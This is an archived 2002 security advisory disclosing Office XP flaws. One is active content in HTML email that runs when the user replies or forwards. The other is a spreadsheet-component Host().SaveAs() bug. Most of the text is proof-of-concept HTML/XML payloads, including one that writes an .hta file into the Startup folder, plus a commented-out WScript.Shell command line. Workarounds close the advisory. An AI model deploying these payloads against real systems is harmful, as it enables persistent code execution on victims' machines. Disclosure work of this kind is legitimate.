2nd Apr 2002 [SBWID-5221]
COMMAND
bug in ms spreadsheet compononent and insertion of active component in
HTML mail
SYSTEMS AFFECTED
Office XP
PROBLEM
Update (04 April 2002) section 3 was added
======
Georgi Guninski in its security advisory #53, 2002
[http://www.guninski.com/m$oxp-2.html] found following bugs regarding
Office XP :
Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author\'s written permission.
If you want to link to this content use the URL:
http://www.guninski.com/m$oxp-2.html
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
Actually there are at least three vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML
mail which is triggered if the user choses reply or forward to the
mail. This opens an exploit scenario for forcing the user to visit a
page in the internet zone of IE at least. For another exploit scenario
check (2)
2. There is a bug in ms spreadsheet compononent. Namely in its Host()
function which may be exploited with the help of (1) or probably from
any document opened with Office application. This buggy function allows
creating files with arbitrary names and their content may be specified
to some extent at which is sufficient to place an executable file
(.hta) in user\'s startup directory which may lead to taking full
control over user\'s computer.
This probably may be called cross application scripting because one
application uses object from another application.
Details:
The following must be put in HTML email which should be opened with
Outlook XP and the user should chose reply or forward.
1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME=\"ExtentX\" VALUE=\"7938\">
<PARAM NAME=\"ExtentY\" VALUE=\"3969\">
<PARAM NAME=\"ViewMode\" VALUE=\"0\">
<PARAM NAME=\"Offline\" VALUE=\"0\">
<PARAM NAME=\"Silent\" VALUE=\"0\">
<PARAM NAME=\"RegisterAsBrowser\" VALUE=\"1\">
<PARAM NAME=\"RegisterAsDropTarget\" VALUE=\"1\">
<PARAM NAME=\"AutoArrange\" VALUE=\"0\">
<PARAM NAME=\"NoClientEdge\" VALUE=\"0\">
<PARAM NAME=\"AlignLeft\" VALUE=\"0\">
<PARAM NAME=\"ViewID\" VALUE=\"{0057D0E0-3573-11CF-AE69-08002B2E1262}\">
<PARAM NAME=\"Location\" VALUE=\"about:/dev/random<script>while (42) alert(\'HOHOHO\\nTrying to sell trustworthy computing\\nHOHOHO\')</script>\">
<PARAM NAME=\"ReadyState\" VALUE=\"4\">
</OBJECT>
-------------------------------------
2.
The office spreadsheet component is something like mini excel. It may
be embeded in web pages (seems not exploitable) and in office documents
(seems exploitable). It supports the Host() function which returns the
hosting object. So if you put in formula \'=Host().SaveAs(\"name\")\'
file with name shall be created.
[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1
v:shapes=\"_x0000_s1026\" class=shape width=81 height=81
u1:shapes=\"_x0000_s1025\">
<param name=DataType value=XMLURL>
<param name=XMLData
value=\"<?xml version=\"1.0\"?>
<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"
xmlns:x=\"urn:schemas-microsoft-com:office:excel\"
xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"
xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"
xmlns:html=\"http://www.w3.org/TR/REC-html40\">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style
ss:ID=\"Default\">
<ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"
ss:ReadingOrder=\"Context\"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"
ss:Italic=\"0\"
ss:Underline=\"None\"/>
<ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>
<ss:NumberFormat ss:Format=\"General\"/>
<ss:Protection
ss:Protected=\"1\"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet
ss:Name=\"Sheet1\">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"
ss:DefaultColumnWidth=\"48.0\"
ss:DefaultRowHeight=\"12.75\">
<ss:Row>
<ss:Cell ss:Formula=\'=HOST().SaveAs(\"C:\\GGGG5\")\'>
<ss:Data ss:Type=\"Boolean\">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name=\"Sheet2\">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name=\"Sheet3\">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef=\"file:///E:\\\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
\">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value=\"Microsoft Office Spreadsheet\">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value=\"80%\">
<param name=MaxWidth value=\"80%\">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------
3. The following must be put in HTML email which should be opened with
Outlook XP and the user should chose reply or forward. Probably it may
also be embeded in .doc or .xls file. The effect is shown after the
user logouts and logins again.
----------------------------------------
<h1>
Hehe. Trying to sell trustworthy computing.
</h1>
<object
classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1
v:shapes=\"_x0000_s1026\" class=shape width=81 height=81
u1:shapes=\"_x0000_s1025\">
<param name=DataType value=XMLURL>
<param name=XMLData
value=\"<?xml version=\"1.0\"?>
<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"
xmlns:x=\"urn:schemas-microsoft-com:office:excel\"
xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"
xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"
xmlns:html=\"http://www.w3.org/TR/REC-html40\">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style
ss:ID=\"Default\">
<ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"
ss:ReadingOrder=\"Context\"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"
ss:Italic=\"0\"
ss:Underline=\"None\"/>
<ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>
<ss:NumberFormat ss:Format=\"General\"/>
<ss:Protection
ss:Protected=\"1\"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet
ss:Name=\"Sheet1\">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"
ss:DefaultColumnWidth=\"48.0\"
ss:DefaultRowHeight=\"12.75\">
<ss:Row>
<ss:Cell ss:Formula=\'=HOST().SaveAs(\"../Start Menu/Programs/StartUp/gggg5.hta\",8)\'>
<ss:Data
ss:Type=\"Boolean\">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name=\"Sheet2\">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name=\"Sheet3\">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef=\"file:///E:\\\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
\">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value=\"Microsoft Office Spreadsheet\">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value=\"80%\">
<param name=MaxWidth value=\"80%\">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
<script>
i=3;
while (i--) confirm(\"Trustworthy?\");
//x=new ActiveXObject(\"WScript.Shell\");
//x.Run(\"C:\\\\WINNT\\\\SYSTEM32\\\\CMD.EXE /C DIR C:\\\\ /a /p /s\");
</script>
------------------------------------------
SOLUTION
Workaround/Solution: The solution is to get a real mail client and
office applications. Workaround for this particular problem is: For (1)
- disable everything that contains \"active\" in IE. For (2) - (Have
not tested it personally) Deregister and delete the ms office
spreadsheet component
Vendor status:
Microsoft was notified on 17 March 2002. They had 2 weeks to produce a
patch but didn\'t.
Regards,
Georgi Guninski
http://www.guninski.com
Update (04 April 2002)
======
Ben Schorr adds :
To work-around this problem in Outlook go to Tools | Options | Mail
Format and uncheck the boxes for \"Use Word to...\" That will cause
Outlook to use it\'s own native editor for such things and shuts the
window on this exploit.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
